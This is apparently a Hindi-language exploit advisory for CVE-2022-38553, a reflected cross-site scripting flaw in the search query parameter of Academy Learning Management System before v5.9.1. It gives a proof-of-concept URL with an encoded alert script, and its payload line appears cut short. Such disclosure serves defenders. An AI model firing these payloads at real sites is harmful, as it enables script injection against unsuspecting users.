
CROSS SITE SCRIPTING (XSS) ON "ACADEMY LEARNING MANAGEMENT SYSTEM" - PROOF OF CONCEPT (POC) CVE-2022-38553
क्रॉस साइट स्क्रिप्टिंग (XSS) "ACADEMY LEARNING MANAGEMENT SYSTEM" < v5.9.1 पर - प्रूफ ऑफ कॉन्सेप्ट (POC) CVE-2022-38553
एक्सप्लॉइट शीर्षक: ACADEMY LEARNING MANAGEMENT SYSTEM < v5.9.1 - क्रॉस साइट स्क्रिप्टिंग (XSS)
CVE ID: CVE-2022-38553
एक्सप्लॉइट लेखक: 4websecurity
लेखक का वेबपेज: https://4websecurity.com
दिनांक: 16-08-2022
विक्रेता होमपेज: https://creativeitem.com
संस्करण: up to 5.9.1
विक्रेता डेमो पेज: https://demo.creativeitem.com/academy/home/
संदर्भ:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38553
https://www.openbugbounty.org/reports/2849933/
https://cve.report/CVE-2022-38553
https://nvd.nist.gov/vuln/detail/CVE-2022-38553
https://youtu.be/yFiZffHoeKs
भेद्यता क्षेत्र:
ACADEMY LEARNING MANAGEMENT SYSTEM <5.9.1 में क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता दूरस्थ हमलावरों को search?query पैरामीटर के माध्यम से मनमाना वेब स्क्रिप्ट या HTML इंजेक्ट करने की अनुमति देती है।
प्रूफ ऑफ कॉन्सेप्ट (POC):
https://example.com/search?query=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
पेलोड:
">
सुरक्षा जोखिम:
यह सुरक्षा भेद्यता उपयोगकर्ता के ब्राउज़र में मनमाना JavaScript कोड निष्पादित करने की अनुमति देती है, यदि वे हमलावरों द्वारा तैयार किए गए URL तक पहुँचते हैं।